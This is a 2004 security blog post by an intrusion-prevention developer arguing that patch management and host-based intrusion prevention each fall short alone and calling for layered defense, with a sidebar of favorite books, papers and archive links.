 |
 |
|
March 29, 2004Patching vs. Intrusion PreventionI better start this entry off by stating that for a living (what puts bread on my table) I write computer security tools and technology, with my latest research into mandatory access control driven by providing "process rights management" through host-based intrusion prevention. Ya its a mouthful, but basically I have written code that grafts onto the Windows kernel to strengthen the Windows platform by providing application confinement and isolation from the rest of the system. The result is that I can apply the rules of least privilege to resources on a machine and provide a safe containment... isolating suspect or even hostile activities from destroying a system. The reason I am telling you this is that today I noticed a debate on Network World called "Is patch mgmt. the best protection against vulnerabilities?" in which Shavlik Technologies (for) and Sana Security (against) face off. Its hard to say this without you snickering at me, but I HATE it when you square off two vendors to make an assessment for the information security profession when both have a stake in their position. (In case you didn't know Shavlik sells patch management software and Sana sells intrusion prevention software) lt is typically biased, and slanted towards their product. Lets get real. The reality is BOTH are right, and BOTH are wrong for different reasons. Lets look at this from an infosec point of view while understanding the mindset of an administrator responsible for the critical infrastructure of an organization. Patch management is only effective when actually completed on a timely manner to reduce the threat of exposure from attack. If you look at the the most recent trends most attack vectors are built AFTER a patch is released, as it is much easier for an attacker to disassemble a patch to find the vulnerabilities(s) in question, and create new hostile code to exploit it. The "for" camp in this argument state that application and OS vendors don't always tell you what the patch fixes, which means you need to patch against the unknown. Here is the problem with that argument. How can an administrator of a Fortune 100 company blindly patch a system with code he knows nothing about... especially if you KNOW the vendor isn't telling you everything? They can't. Which is why they typically do a staged roll out in a 'clean room' to do regression testing against their existing architecture. And in many cases.. the patches do more harm to their system than good. Countless avenues of attack are meanwhile generated, exposing the business to more risk. The time between patch release and exploit release is shortening, as attackers get smarter in their disassembly techniques. On the other side, the "against" camp state that because customers are not aware of new vulnerabilities they cannot defend against the new exploits... but host-based intrusion prevention software will solve it. There is a catch they don't want to tell you. Most intrusion prevention systems use a combination of signature based techniques and whitelist databases to determine access control. Problem with this is that new 0 day attacks don't play by these rules, and they can typically get around such techniques. More over, if you use a stringent set of rules of "don't"... you end up with an administrative nightmare trying to tune the IPS to work in your environment. Proof is in how signature based solutions have failed in other security verticals. Look at antivirus and personal firewalls as an example. The latest CSI/FBI Computer Crime and Security Survey shows that of those organizations that reported breaches in the last 12 months, 98% had firewalls in place, and 99% had antivirus. Yet they were still breached. Does that mean we throw the technology out? No. It just means that they don't work alone, in isolated environments. And how much MORE extent would the breach have been WITHOUT the technology in place? To properly defend against the digital divide, we need to use a layered defensive posture which includes it all. We should have firewalls, antivirus, network IDS, host-based IPS and patch management. Our decisions have to be of a BIGGER process in the security management lifecycle. (This is why Schneier says security is a process, not a product) Remember when I was talking about the 8 rules of Information Security last year? Using a defensive posture like this touches on almost every rule:
My point here folks is that as vendors, we sometimes seem to use FUD or "tainted" messeging to sell out products. Don't buy into it. (And if you ever see my company do it, please email me with stern warning and point me to this entry) Always consider the bigger picture in your security management lifecycle when evaluating technology. After all... technology is simply an enabler. Its not the solution! Oh... and if you ARE going to roll out host-based intrusion prevention on Microsoft Windows servers, contact me. I might be able to help you out. :) Posted by SilverStr at March 29, 2004 09:15 AM | TrackBack |
 
My 5 Favorite Books
Writing Secure Code
Secure Programming Cookbook Security Engineering Secure Coding Principles & Practice Inside the Security Mind
My 5 Favorite Papers
Smashing the Stack
Penetration Studies Covert Channel Analysis of Trusted Systems DoD Trusted Computer System Evaluation Criteria NSA Security Recommendation Guides
Archives
January 2007
December 2006 November 2006 October 2006 September 2006 August 2006 July 2006 June 2006 May 2006 April 2006 March 2006 February 2006 January 2006 December 2005 November 2005 October 2005 September 2005 August 2005 July 2005 June 2005 May 2005 April 2005 March 2005 February 2005 January 2005 December 2004 November 2004 October 2004 September 2004 August 2004 July 2004 June 2004 May 2004 April 2004 March 2004 February 2004 January 2004 December 2003 November 2003 October 2003 September 2003 August 2003 July 2003 June 2003 May 2003 April 2003 March 2003 February 2003 January 2003 December 2002 November 2002 October 2002 September 2002 August 2002 July 2002 |
|
